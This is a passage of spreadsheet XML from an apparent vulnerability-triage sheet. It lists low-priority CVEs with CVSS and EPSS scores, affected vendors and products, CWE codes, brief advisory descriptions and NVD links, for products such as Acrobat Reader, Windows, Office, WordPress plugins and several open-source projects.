      <c r="L4721" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M4721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81984</t>
        </is>
      </c>
    </row>
    <row r="4722">
      <c r="A4722" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81991</t>
        </is>
      </c>
      <c r="C4722" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4722" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4722" s="5" t="inlineStr"/>
      <c r="F4722" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4722" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4722" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I4722" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4722" s="5" t="inlineStr"/>
      <c r="K4722" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4722"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4722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81991</t>
        </is>
      </c>
    </row>
    <row r="4723">
      <c r="A4723" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81993</t>
        </is>
      </c>
      <c r="C4723" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4723" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4723" s="5" t="inlineStr"/>
      <c r="F4723" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4723" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4723" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I4723" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4723" s="5" t="inlineStr"/>
      <c r="K4723" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L4723" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Heap-based Buffer Overflow vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M4723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81993</t>
        </is>
      </c>
    </row>
    <row r="4724">
      <c r="A4724" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82001</t>
        </is>
      </c>
      <c r="C4724" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4724" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4724" s="5" t="inlineStr"/>
      <c r="F4724" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4724" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4724" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I4724" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4724" s="5" t="inlineStr"/>
      <c r="K4724" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L4724" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M4724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82001</t>
        </is>
      </c>
    </row>
    <row r="4725">
      <c r="A4725" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82193</t>
        </is>
      </c>
      <c r="C4725" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4725" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4725" s="5" t="inlineStr"/>
      <c r="F4725" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4725" s="5" t="inlineStr"/>
      <c r="H4725" s="5" t="inlineStr"/>
      <c r="I4725" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4725" s="5" t="inlineStr"/>
      <c r="K4725" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4725" s="5" t="inlineStr">
        <is>
          <t>The WPvivid — Backup, Migration &amp; Staging WordPress plugin before 0.9.134 does not validate a user supplied file name before using it to build a write path, allowing administrators to write files of permitted types to arbitrary locations on the server and to overwrite existing files.</t>
        </is>
      </c>
      <c r="M4725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82193</t>
        </is>
      </c>
    </row>
    <row r="4726">
      <c r="A4726" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82194</t>
        </is>
      </c>
      <c r="C4726" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4726" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4726" s="5" t="inlineStr"/>
      <c r="F4726" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4726" s="5" t="inlineStr"/>
      <c r="H4726" s="5" t="inlineStr"/>
      <c r="I4726" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4726" s="5" t="inlineStr"/>
      <c r="K4726" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L4726" s="5" t="inlineStr">
        <is>
          <t>The WPvivid — Backup, Migration &amp; Staging WordPress plugin before 0.9.134 does not validate a user supplied path before using it in a file deletion routine, allowing administrators to delete arbitrary files on the server, including files outside the web root.</t>
        </is>
      </c>
      <c r="M4726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82194</t>
        </is>
      </c>
    </row>
    <row r="4727">
      <c r="A4727" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82547</t>
        </is>
      </c>
      <c r="C4727" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4727" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4727" s="5" t="inlineStr"/>
      <c r="F4727" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4727" s="5" t="inlineStr"/>
      <c r="H4727" s="5" t="inlineStr"/>
      <c r="I4727" s="5" t="inlineStr">
        <is>
          <t>2026-08-30</t>
        </is>
      </c>
      <c r="J4727" s="5" t="inlineStr"/>
      <c r="K4727" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L4727" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Linux Foundation Magma 1.9.0. The affected element is an unknown function of the file tasks/amf/amf_fsm.cpp of the component Registration Complete Message Handler. The manipulation results in improper authentication. The attack can be launched remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="M4727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82547</t>
        </is>
      </c>
    </row>
    <row r="4728">
      <c r="A4728" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83501</t>
        </is>
      </c>
      <c r="C4728" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4728" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4728" s="5" t="inlineStr"/>
      <c r="F4728" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4728" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4728" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I4728" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4728" s="5" t="inlineStr"/>
      <c r="K4728" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4728" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83501</t>
        </is>
      </c>
    </row>
    <row r="4729">
      <c r="A4729" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83949</t>
        </is>
      </c>
      <c r="C4729" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4729" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4729" s="5" t="inlineStr"/>
      <c r="F4729" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4729" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4729" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I4729" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4729" s="5" t="inlineStr"/>
      <c r="K4729" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L4729" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83949</t>
        </is>
      </c>
    </row>
    <row r="4730">
      <c r="A4730" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83951</t>
        </is>
      </c>
      <c r="C4730" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4730" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4730" s="5" t="inlineStr"/>
      <c r="F4730" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4730" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4730" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I4730" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4730" s="5" t="inlineStr"/>
      <c r="K4730" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L4730" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83951</t>
        </is>
      </c>
    </row>
    <row r="4731">
      <c r="A4731" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83991</t>
        </is>
      </c>
      <c r="C4731" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4731" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4731" s="5" t="inlineStr"/>
      <c r="F4731" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4731" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H473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4731" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4731" s="5" t="inlineStr"/>
      <c r="K4731" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L4731" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Cloud Files Mini Filter Driver allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M4731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83991</t>
        </is>
      </c>
    </row>
    <row r="4732">
      <c r="A4732" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85381</t>
        </is>
      </c>
      <c r="C4732" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4732" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4732" s="5" t="inlineStr"/>
      <c r="F4732" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4732" s="5" t="inlineStr"/>
      <c r="H4732" s="5" t="inlineStr"/>
      <c r="I4732" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4732" s="5" t="inlineStr"/>
      <c r="K4732" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="L4732" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in light0011 cms c774dce31c6df0055568a8d5c53d964d99be199d/f72cf46f601efb2a0618c3814cc2f61380b38930. This issue affects some unknown processing of the file App/Home/Controller/ChapterController.class.php of the component Chapter Controller. Such manipulation of the argument content leads to authorization bypass. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85381</t>
        </is>
      </c>
    </row>
    <row r="4733">
      <c r="A4733" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85399</t>
        </is>
      </c>
      <c r="C4733" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4733" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4733" s="5" t="inlineStr"/>
      <c r="F4733" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4733" s="5" t="inlineStr"/>
      <c r="H4733" s="5" t="inlineStr"/>
      <c r="I4733" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4733" s="5" t="inlineStr"/>
      <c r="K4733" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4733" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in code-projects Hospital Information System 1.0. Affected by this vulnerability is the function getSinglePresp of the file includes/presp/PrespController.php. Performing a manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks.</t>
        </is>
      </c>
      <c r="M4733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85399</t>
        </is>
      </c>
    </row>
    <row r="4734">
      <c r="A4734" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85517</t>
        </is>
      </c>
      <c r="C4734" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4734" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4734" s="5" t="inlineStr"/>
      <c r="F4734" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4734" s="5" t="inlineStr"/>
      <c r="H4734" s="5" t="inlineStr"/>
      <c r="I4734" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4734" s="5" t="inlineStr"/>
      <c r="K4734" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="L4734" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in code-projects Vehicle Management System 1.0. The impacted element is an unknown function of the file /vehicle_management.sql of the component SQL Database Backup File Handler. Executing a manipulation can lead to information disclosure. It is possible to launch the attack remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M4734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85517</t>
        </is>
      </c>
    </row>
    <row r="4735">
      <c r="A4735" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85522</t>
        </is>
      </c>
      <c r="C4735" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4735" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4735" s="5" t="inlineStr"/>
      <c r="F4735" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4735" s="5" t="inlineStr"/>
      <c r="H4735" s="5" t="inlineStr"/>
      <c r="I4735" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4735" s="5" t="inlineStr"/>
      <c r="K4735" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-125</t>
        </is>
      </c>
      <c r="L4735" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in valkey-io valkey up to 9.5.4/9.1.0. Affected by this vulnerability is the function createSlotImportJob of the file src/cluster_migrateslots.c of the component Slot Migration. The manipulation of the argument job_name results in out-of-bounds read. The attack can be executed remotely. The exploit is now public and may be used. Upgrading to version 9.0.5 and 9.1.1 addresses this issue. The patch is identified as f4dc3ca09eb650c2fe14060090a41c524eca803f. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="M4735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85522</t>
        </is>
      </c>
    </row>
    <row r="4736">
      <c r="A4736" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85636</t>
        </is>
      </c>
      <c r="C4736" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4736" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4736" s="5" t="inlineStr"/>
      <c r="F4736" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4736" s="5" t="inlineStr"/>
      <c r="H4736" s="5" t="inlineStr"/>
      <c r="I4736" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4736" s="5" t="inlineStr"/>
      <c r="K4736" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="L4736" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in jofpin trape 1.0.0. Affected by this vulnerability is an unknown functionality of the file core/stats.py of the component Login Endpoint. The manipulation leads to missing authentication. The attack may be initiated remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85636</t>
        </is>
      </c>
    </row>
    <row r="4737">
      <c r="A4737" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85637</t>
        </is>
      </c>
      <c r="C4737" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4737" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4737" s="5" t="inlineStr"/>
      <c r="F4737" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4737" s="5" t="inlineStr"/>
      <c r="H4737" s="5" t="inlineStr"/>
      <c r="I4737" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4737" s="5" t="inlineStr"/>
      <c r="K4737" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="L4737" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in jofpin trape 1.0.0/2.0. Affected by this issue is the function join_room of the file core/sockets.py of the component Admin Endpoint. The manipulation results in missing authentication. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85637</t>
        </is>
      </c>
    </row>
    <row r="4738">
      <c r="A4738" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85638</t>
        </is>
      </c>
      <c r="C4738" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4738" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4738" s="5" t="inlineStr"/>
      <c r="F4738" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4738" s="5" t="inlineStr"/>
      <c r="H4738" s="5" t="inlineStr"/>
      <c r="I4738" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4738" s="5" t="inlineStr"/>
      <c r="K4738" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="L4738" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in jofpin trape 2.0. This affects an unknown part of the file core/user.py. This manipulation of the argument vId/id causes authorization bypass. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85638</t>
        </is>
      </c>
    </row>
    <row r="4739">
      <c r="A4739" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85701</t>
        </is>
      </c>
      <c r="C4739" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4739" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4739" s="5" t="inlineStr"/>
      <c r="F4739" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4739" s="5" t="inlineStr"/>
      <c r="H4739" s="5" t="inlineStr"/>
      <c r="I4739" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4739" s="5" t="inlineStr"/>
      <c r="K4739" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="L4739" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in ramon-victor freegpt-webui up to 098db3dfeb41555c2ca9269df0f13e10ec1c35dc. This issue affects the function ChatCompletion.create of the file g4f/__init__.py of the component Authentication Check. Such manipulation leads to missing authentication. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. This vulnerability only affects products that are no longer supported by the maintainer.</t>
        </is>
      </c>
      <c r="M4739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85701</t>
        </is>
      </c>
    </row>
    <row r="4740">
      <c r="A4740" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85702</t>
        </is>
      </c>
      <c r="C4740" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4740" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4740" s="5" t="inlineStr"/>
      <c r="F4740" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4740" s="5" t="inlineStr"/>
      <c r="H4740" s="5" t="inlineStr"/>
      <c r="I4740" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4740" s="5" t="inlineStr"/>
      <c r="K4740" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="L4740" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in ramon-victor freegpt-webui up to 098db3dfeb41555c2ca9269df0f13e10ec1c35dc. Affected is the function _conversation of the file server/backend.py of the component Backend Conversation API. Such manipulation of the argument model leads to missing authentication. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. This vulnerability only affects products that are no longer supported by the maintainer.</t>
        </is>
      </c>
      <c r="M4740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85702</t>
        </is>
      </c>
    </row>
    <row r="4741">
      <c r="A4741" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85703</t>
        </is>
      </c>
      <c r="C4741" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4741" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4741" s="5" t="inlineStr"/>
      <c r="F4741" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4741" s="5" t="inlineStr"/>
      <c r="H4741" s="5" t="inlineStr"/>
      <c r="I4741" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4741" s="5" t="inlineStr"/>
      <c r="K4741" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L4741" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in ramon-victor freegpt-webui up to 098db3dfeb41555c2ca9269df0f13e10ec1c35dc. Affected by this issue is the function getJailbreak of the file server/backend.py of the component Jailbreak Mode. Executing a manipulation can lead to allocation of resources. The attack can be executed remotely. The exploit has been published and may be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. This vulnerability only affects products that are no longer supported by the maintainer.</t>
        </is>
      </c>
      <c r="M4741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85703</t>
        </is>
      </c>
    </row>
    <row r="4742">
      <c r="A4742" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85875</t>
        </is>
      </c>
      <c r="C4742" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4742" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4742" s="5" t="inlineStr"/>
      <c r="F4742" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4742" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4742" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I4742" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4742" s="5" t="inlineStr"/>
      <c r="K4742" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4742" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85875</t>
        </is>
      </c>
    </row>
    <row r="4743">
      <c r="A4743" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4743" s="5" t="inlineStr">
        <is>
